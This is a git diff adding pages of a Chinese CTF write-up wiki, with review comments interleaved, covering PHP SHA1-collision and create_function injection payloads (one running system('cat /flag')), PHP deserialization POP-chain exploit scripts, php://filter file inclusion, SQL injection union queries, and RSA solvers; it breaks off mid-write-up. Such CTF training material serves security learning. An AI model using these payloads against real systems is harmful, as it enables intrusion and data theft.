+&array2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
+解决
+得到level 3地址
+level-3
+php sha1 强碰撞
+post
+array1=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1
+&array2=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1
+得到level-4地址
+level-4
+php变量解析绕过
+使用GET NI+SA+=txw4ever
+得到level5地址
+level-5
+createfunction绕过
+exp
+?a=\create_function&b=return%200;}var_dump(system("cat%20/flag"));/*
+得到flag
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/problem-2049-wp/index.html b/ctfnotes/problem-2049-wp/index.html
new file mode 100755
index 0000000..5f81a44
--- /dev/null
+++ b/ctfnotes/problem-2049-wp/index.html
@@ -0,0 +1,1280 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [NISACTF 2022]huaji? - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[NISACTF 2022]huaji?
+
+binwalk分析
+得到内部有个压缩包
+加密了
+在原图大空白处找到
+两段
+6374665f4e4953415f32303232
+6e6973615f32303232
+hex编码得
+ctf_NISA_2022
+和nisa_2022
+成功解压压缩包得到flag
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/problem-2074-wp/index.html b/ctfnotes/problem-2074-wp/index.html
new file mode 100755
index 0000000..0e5fede
--- /dev/null
+++ b/ctfnotes/problem-2074-wp/index.html
@@ -0,0 +1,1268 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [NSSCTF 2022 Spring Recruit]ezgame - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[NSSCTF 2022 Spring Recruit]ezgame
+F12分析即拿flag在./js/preload.js里
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/problem-2076-wp/index.html b/ctfnotes/problem-2076-wp/index.html
new file mode 100755
index 0000000..0910326
--- /dev/null
+++ b/ctfnotes/problem-2076-wp/index.html
@@ -0,0 +1,1275 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [NSSCTF 2022 Spring Recruit]babyphp - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[NSSCTF 2022 Spring Recruit]babyphp
+
+第一层非空数组绕过
+post a[]=[1]
+非空空数组MD5
+post b1[]=[1]&b2[]=[2]
+MD5 绕过
+post c1=s878926199a&c2=s155964671a
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/problem-2099-wp/index.html b/ctfnotes/problem-2099-wp/index.html
new file mode 100755
index 0000000..2d9d02c
--- /dev/null
+++ b/ctfnotes/problem-2099-wp/index.html
@@ -0,0 +1,1349 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [NISACTF 2022]popchains - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[NISACTF 2022]popchains
+
+审计源码
+构建pop链
+
+Try_Work_Hard.__invoke()
+ =>Make_a_change.__get
+ => Road_is_Long.__toString()
+ => Road_is_Long.__wakeup()
+
+
+编写exp
+~~有坏b误导我我不说是谁~~
+
+<?php
+
+//echo 'Happy New Year~ MAKE A WISH<br>';
+
+/***************************pop your 2022*****************************/
+
+class Road_is_Long
+{
+ public $page;
+ public $string;
+ public function __construct($file = 'index.php')
+ {
+ $this->page = $file;
+ }
+ public function __toString()
+ {
+ return $this->string->page;
+ }
+
+ public function __wakeup()
+ {
+ if (preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
+ echo "You can Not Enter 2022";
+ $this->page = "index.php";
+ }
+ }
+}
+
+class Try_Work_Hard
+{
+ protected $var;
+ public function __construct(){
+ $this->var = "/flag";
+ }
+ public function append($value)
+ {
+ include($value);
+ }
+ public function __invoke()
+ {
+ $this->append($this->var);
+ }
+}
+
+class Make_a_Change
+{
+ public $effort;
+ public function __construct()
+ {
+ $this->effort = array();
+ }
+
+ public function __get($key)
+ {
+ $function = $this->effort;
+ return $function();
+ }
+}
+
+$a = new Try_Work_Hard;
+$b = new Make_a_Change;
+$c = new Road_is_Long;
+$d = new Road_is_Long;
+
+$b->effort = $a;
+$c->string = $b;
+$d->page = $c;
+echo "?wish=" . urlencode(serialize($d));
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/problem-227-wp/index.html b/ctfnotes/problem-227-wp/index.html
new file mode 100755
index 0000000..08307da
--- /dev/null
+++ b/ctfnotes/problem-227-wp/index.html
@@ -0,0 +1,1291 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [羊城杯 2021]Bigrsa - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[羊城杯 2021]Bigrsa
+
+共享素数
+$n_1 n_2$有一素数公因数$p$
+$n_1=pq_1 n_2=pq_2$
+$d_1e\equiv 1\space mod\space\varphi(n_1)$
+$d_2e\equiv 1\space mod\space\varphi(n_2)$
+$\therefore 只需要逆元求出\frac{1}{e}\space mod\space \varphi(n_1)和\frac{1}{e}\space mod\space \varphi(n_2)就可以得到d_1和d_2$
+exp
+
+from gmpy2 import *
+from Crypto.Util.number import *
+
+n1 = 103835296409081751860770535514746586815395898427260334325680313648369132661057840680823295512236948953370895568419721331170834557812541468309298819497267746892814583806423027167382825479157951365823085639078738847647634406841331307035593810712914545347201619004253602692127370265833092082543067153606828049061
+n2 = 115383198584677147487556014336448310721853841168758012445634182814180314480501828927160071015197089456042472185850893847370481817325868824076245290735749717384769661698895000176441497242371873981353689607711146852891551491168528799814311992471449640014501858763495472267168224015665906627382490565507927272073
+e = 65537
+c = 60406168302768860804211220055708551816238816061772464557956985699400782163597251861675967909246187833328847989530950308053492202064477410641014045601986036822451416365957817685047102703301347664879870026582087365822433436251615243854347490600004857861059245403674349457345319269266645006969222744554974358264
+p = gmpy2.gcd(n1, n2)
+q1, q2 = n1//p, n2//p
+phi_n1, phi_n2 = (p-1)*(q1-1), (p-1)*(q2-1)
+d1, d2 = inverse(e, phi_n1), inverse(e, phi_n2)
+
+m = pow(pow(c, d2, n2), d1, n1)
+print(long_to_bytes(m).decode())
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/problem-2422-wp/index.html b/ctfnotes/problem-2422-wp/index.html
new file mode 100755
index 0000000..f531631
--- /dev/null
+++ b/ctfnotes/problem-2422-wp/index.html
@@ -0,0 +1,1306 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [鹏城杯 2022]简单包含 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[鹏城杯 2022]简单包含
+
+审计源码发现其会include'flag'的文件进来
+尝试post flag
+
+exp-fake
+flag = flag.php
+
+获得nssctf waf!
+尝试获取flag.php
+flag = php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php
+
+仍然获得获得nssctf waf!
+尝试获取index.php
+flag = php://filter/read=convert.base64-encode/resource=/var/www/html/index.php
+
+解码得
+<?php
+
+$path = $_POST["flag"];
+
+if (strlen(file_get_contents('php://input')) < 800 && preg_match('/flag/', $path)) {
+ echo 'nssctf waf!';
+} else {
+ @include($path);
+} ?>
+
+<code>
+<span style="color: #000000">
+<span style="color: #0000BB"><?php <br />highlight_file</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);<br />include(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">"flag"</span><span style="color: #007700">]);<br /></span><span style="color: #FF8000">//flag in /var/www/html/flag.php;</span>
+</span>
+</code><br />
+
+
+得知可以通过post超长的request来绕过
+所以
+exp
+a=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&flag = php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php
+
+解码即获得flag
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
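Review bot: The sentence `得知可以通过post超长的request来绕过` gives the conclusion without pointing at the line that causes it. In the decoded index.php the filter is `strlen(file_get_contents('php://input')) < 800 && preg_match('/flag/', $path)`, so the `/flag/` match is only enforced while the body is under 800 bytes; one sentence saying that the `&&` ties the content check to the length check would make the write-up self-explanatory. It is also worth stating that the block-list is beside the point: `@include($path)` on a `$_POST` value is the flaw, and the `@` additionally hides the warnings that would reveal failed attempts in logs.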
diff --git a/ctfnotes/problem-2602-wp/index.html b/ctfnotes/problem-2602-wp/index.html
new file mode 100755
index 0000000..433f152
--- /dev/null
+++ b/ctfnotes/problem-2602-wp/index.html
@@ -0,0 +1,1276 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [HUBUCTF 2022 新生赛]checkin - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[HUBUCTF 2022 新生赛]checkin
+
+审计源码 发现使用 ==
+写exp
+
+<?php
+$data_unserialize = ["username"=>true,"password"=>true];
+echo "?info="urlencode(serialize(($data_unserialize)));
+
+传入即得
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
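Review bot: The second statement of the PHP snippet, `echo "?info="urlencode(serialize(($data_unserialize)));`, is a syntax error because the string and the call are not joined; it needs the concatenation operator, `echo "?info=" . urlencode(serialize($data_unserialize));`. The text says only `发现使用 ==`; adding that a loose comparison treats boolean `true` as equal to most non-empty strings, and that `===` or `hash_equals()` on the server side avoids this, would explain why an array of `true` values passes the check (the challenge source itself is not shown on the page).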
diff --git a/ctfnotes/problem-39-wp/index.html b/ctfnotes/problem-39-wp/index.html
new file mode 100755
index 0000000..32f42e0
--- /dev/null
+++ b/ctfnotes/problem-39-wp/index.html
@@ -0,0 +1,1282 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [SWPU 2019]神奇的二维码 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[SWPU 2019]神奇的二维码
+
+binwalk 分析
+发现里面有4个压缩包
+binwalk -b 解开
+得到flag.doc
,flag.jpg
,encode.txt
,good.rar
+4个主要文件
+对flag.doc内部内容解码
+得到
+comEON_YOuAreSOSoS0great
+这个就是good.rar的解压密码
+解开good.rar得到good.mp3
+听一下为摩斯电码
+Audacity 可视化
+在线解码下得到flag
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/ctfnotes/problem-403-wp/index.html b/ctfnotes/problem-403-wp/index.html
new file mode 100755
index 0000000..748d92a
--- /dev/null
+++ b/ctfnotes/problem-403-wp/index.html
@@ -0,0 +1,1286 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [SWPUCTF 2021 新生赛]简简单单的逻辑 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[SWPUCTF 2021 新生赛]简简单单的逻辑
+
+审计源码
+因为异或的逆运算就是异或
+所以可以直接编写exp
+编写exp
+
+def decode(cipher):
+ flag = ''
+ for i in range(len(list)):
+ key = (list[i]>>4)+((list[i] & 0xf)<<4)
+ now = cipher[2*i:2*i+2]
+ print(now)
+ now = int(now,16)
+ print(now)
+ now^=key
+ flag+=chr(now)
+ print(flag)
+decode(result)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
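Review bot: `decode` reads two names the snippet never defines, `list` and `result`, so it cannot run as shown; presumably both come from the challenge source, and the page should either include them or say where they come from. Using `list` as a variable name also shadows the built-in, so passing the key bytes in as a parameter, `def decode(cipher, key_bytes):`, would be clearer. The two `print(now)` calls look like leftover debugging output.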
diff --git a/ctfnotes/problem-404-wp/index.html b/ctfnotes/problem-404-wp/index.html
new file mode 100755
index 0000000..31d3f5c
--- /dev/null
+++ b/ctfnotes/problem-404-wp/index.html
@@ -0,0 +1,1293 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [SWPUCTF 2021 新生赛]简简单单的解密 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[SWPUCTF 2021 新生赛]简简单单的解密
+没什么好写的照着代码逆回去就行了
+import base64
+import urllib.parse
+key = "HereIsFlagggg"
+s_box = list(range(256))
+j = 0
+for i in range(256):
+ j = (j + s_box[i] + ord(key[i % len(key)])) % 256
+ s_box[i], s_box[j] = s_box[j], s_box[i]
+enc = "%C2%A6n%C2%87Y%1Ag%3F%C2%A01.%C2%9C%C3%B7%C3%8A%02%C3%80%C2%92W%C3%8C%C3%BA"
+
+enc = urllib.parse.unquote(enc)
+crypt = str(base64.b64encode(bytes(enc, 'utf8')), 'utf-8')
+cipher = base64.b64decode(bytes(crypt, 'utf8')).decode('utf-8')
+res = list(cipher)
+flag = ''
+i = j = 0
+for s in res:
+ i = (i + 1) % 256
+ j = (j + s_box[i]) % 256
+ s_box[i], s_box[j] = s_box[j], s_box[i]
+ t = (s_box[i] + s_box[j]) % 256
+ k = s_box[t]
+ flag += chr(ord(s)^k)
+print(flag)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
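Review bot: The two base64 lines (`crypt = str(base64.b64encode(...))` followed by `cipher = base64.b64decode(...).decode('utf-8')`) encode and immediately decode the same string, so `cipher` equals `enc`. Both lines can be replaced by `res = list(enc)`. The script would also read better with two comments: `# RC4 key scheduling (KSA) over the hard-coded key` above the first loop and `# RC4 keystream generation, XORed with each ciphertext character` above the second. The text should also say that `urllib.parse.unquote` decodes the percent-escapes as UTF-8, so the loop works on code points rather than raw bytes (`%C2%A6` becomes a single character); in this ciphertext every code point is below 256, which is why `ord(s)^k` still yields one byte per character.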
diff --git a/ctfnotes/problem-413-wp/index.html b/ctfnotes/problem-413-wp/index.html
new file mode 100755
index 0000000..3ec3c6f
--- /dev/null
+++ b/ctfnotes/problem-413-wp/index.html
@@ -0,0 +1,1344 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [SWPUCTF 2021 新生赛]crypto2 - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[SWPUCTF 2021 新生赛]crypto2
+共模攻击
+顺便巩固下rsa
+符号
+c
:密文
+m
:明文
+(d,n)
:私钥
+(e,n)
:公钥
+p
q
为生成n
的两个大质数
+有$n=pq$
+由欧拉函数的定义得$\varphi (n)=\varphi (p)\varphi (q)=(p-1)(q-1)$
+任意选一正整数e 使得$gcd(e,\varphi (n))=1$
+$d$ 满足 $(de)\space mod \space \varphi (n)=1$ 即 $(de) = k\varphi (n)+1,k \ge 1$
+将$m$加密为$c$
+$c=m^e\space mod \space n$
+将$c$解密为$m$
+$m=c^d\space mod \space n$
+证明
+$$
+\because c=m^e\space mod \space n\
+\therefore c \equiv m^e\space mod \space n\
+\therefore c^d \equiv m^{ed}\space mod \space n\
+\therefore c^d \equiv m^{k\varphi (n)+1}\space mod \space n\
+\space\
+当gcd(m,n)=1时有:\
+c^d \equiv (m^{\varphi (n)})^{k}\times m\space mod \space n\
+c^d \equiv 1^k\times m\space mod \space n\
+c^d \equiv m\space mod \space n\
+\space\
+当gcd(m,n)\ne1时有:\
+此时必定有gcd(q,m)=1或gcd(p,m)=1\
+设m=m^{'}p \space 此时 gcd(q,m)=1\
+c^d \equiv m^{k\varphi (p)\varphi (q)}\times m\space mod\space n\
+c^d \equiv (m^{\varphi(q)\varphi(p)})^{k}\times m\space mod \space n\
+又\because m^{\varphi(q)}\equiv 1 \space mod \space q\
+\therefore m^{k\varphi(q)\varphi(p)}\equiv 1^{k\varphi(p)} \space mod \space q\
+\therefore m^{k\varphi(q)\varphi(p)}=(k_2q+1)
+代入得\
+c^d \equiv (k_2q+1)\times m\space mod \space n\
+c^d \equiv (k_2m^{'}pq+m)\times m\space mod \space n\
+c^d \equiv m\space mod \space n\
+证毕.
+$$
+附:
+1. 欧拉定理
+$$
+a^{\varphi(n)}\equiv 1\space mod\space n,当gcd(n,a)=1且n,a\ge0
+$$
+且当n为质数时为费马小定理
+$$
+a^{n-1}\equiv 1(mod\space n)
+$$
+共模攻击原理
+$e_1,e_2,n,c_1,c_2$ 已知
+且
+$c_1=m^{e_1}\space mod
+ \space n$
+ $c_2=m^{e_2}\space mod
+ \space n$
+当$gcd(e_1,e_2)=1$
+有$m=(c_1^{s_1}\times c_2^{s_2})\space mod \space n$
+其中$e_1s_1+e_2s_2=1$
+证明
+$$
+m\
+=m^1\
+=m^{e_1s_1+e_2s_2}\
+=(m^{e_1})^{s_1}(m^{e_2})^{s_2}\
+\equiv c_1^{s_1}c_2^{s_2}\space mod\space n\
+证毕.
+$$
+所以解共模题时只要用exgcd求出
+$s_1,s_2$
+附:
+1. 贝祖定理
+$$
+ax+by=gcd(a,b)
+$$
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
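Review bot: In the gcd(m,n)≠1 branch of the RSA proof, the step `c^d \equiv (k_2m^{'}pq+m)\times m` carries a stray `\times m`. Expanding `(k_2q+1)\times m` with `m=m'p` already gives `k_2m'pq+m`, which is what the final line `c^d \equiv m` needs. The common-modulus section should also state that one of `s_1`, `s_2` returned by the extended Euclid step is negative, so the corresponding ciphertext has to be inverted modulo n (which requires it to be coprime to n) before it is raised to the absolute value of that exponent. The display blocks end their lines with a single `\`; if the markdown source is the same, the breaks need `\\` to render.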
diff --git a/ctfnotes/problem-440-wp/index.html b/ctfnotes/problem-440-wp/index.html
new file mode 100755
index 0000000..37c958a
--- /dev/null
+++ b/ctfnotes/problem-440-wp/index.html
@@ -0,0 +1,1334 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [SWPUCTF 2021 新生赛]pop - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[SWPUCTF 2021 新生赛]pop
+~~你这个取名真的可以的~~
+1. 审计源码
+2. 寻找pop链
+知识点:
+变量后面加括号是动态调用函数
+$abc('asd')
+等价于
+asd(abc);
+
+unserialize -> w22m.__construct -> w22m.__destruct ->
+w33m.__toString -> w44m.__construct & w44m.Getflag
+
+编写exp
+
+<?php
+class w44m
+{
+ private $admin = 'aaa';
+ protected $passwd = '123456';
+ public function __construct()
+ {
+ $this->admin = 'w44m';
+ $this->passwd = '08067';
+ }
+ public function Getflag()
+ {
+ if ($this->admin === 'w44m' && $this->passwd === '08067') {
+ include('flag.php');
+ echo $flag;
+ } else {
+ echo $this->admin;
+ echo $this->passwd;
+ echo 'nono';
+ }
+ }
+}
+class w33m
+{
+ public $w00m;
+ public $w22m;
+ public function __toString()
+ {
+ $this->w00m->{$this->w22m}();
+ return 0;
+ }
+ public function __construct(){
+ $this->w22m = "Getflag";
+ $this->w00m = new w44m;
+ }
+}
+class w22m
+{
+ public $w00m;
+ public function __destruct()
+ {
+ echo $this->w00m;
+ }
+ public function __construct()
+ {
+ $this->w00m = new w33m;
+ }
+}
+
+$a = new w22m;
+echo "?w00m=".urlencode(serialize($a))
+ ?>
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
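Review bot: The chain written above the script, `unserialize -> w22m.__construct -> w22m.__destruct -> ...`, lists constructors as if `unserialize()` invoked them, but PHP does not run `__construct` when it rebuilds an object. The constructors added in this script only run locally, to set the properties that get serialized, so the chain should read `unserialize -> w22m::__destruct -> w33m::__toString -> w44m::Getflag`. The note on variable functions is also reversed: `$abc('asd')` calls the function whose name is stored in `$abc` with the argument `'asd'`, not `asd(abc)`. For readers on the defending side, the write-up should name the root cause the chain implies, which is request data reaching `unserialize()`, and the usual fix of decoding with `json_decode()` or passing `['allowed_classes' => false]`.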
diff --git a/ctfnotes/problem-442-wp/index.html b/ctfnotes/problem-442-wp/index.html
new file mode 100755
index 0000000..dcf5c76
--- /dev/null
+++ b/ctfnotes/problem-442-wp/index.html
@@ -0,0 +1,1283 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ [SWPUCTF 2021 新生赛]sql - XMUTSEC Wiki
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[SWPUCTF 2021 新生赛]sql
+
+传入wllm参数
+hint:Want Me? Cross the Waf
+沙箱绕过
+主要限制为
+ban 空格 等号 限制输出大小20字
+exp编写
+exp1(查询数据表)
+?wllm=-1'union/**/select/**/1,group_concat(TABLE_NAME),3/**/from/**/information_schema.tables/**/where/**/TABLE_SCHEMA/**/like/**/'test_db'%23
+可以看到test_db内的表
+有LTLT_flag和user
+exp2(查询表内字段)
+?wllm=-1'union/**/select/**/1,group_concat(COLUMN_NAME),3/**/from/**/information_schema.columns/**/where/**/TABLE_NAME/**/like/**/'LTLT_flag'%23
+exp3(输出flag)
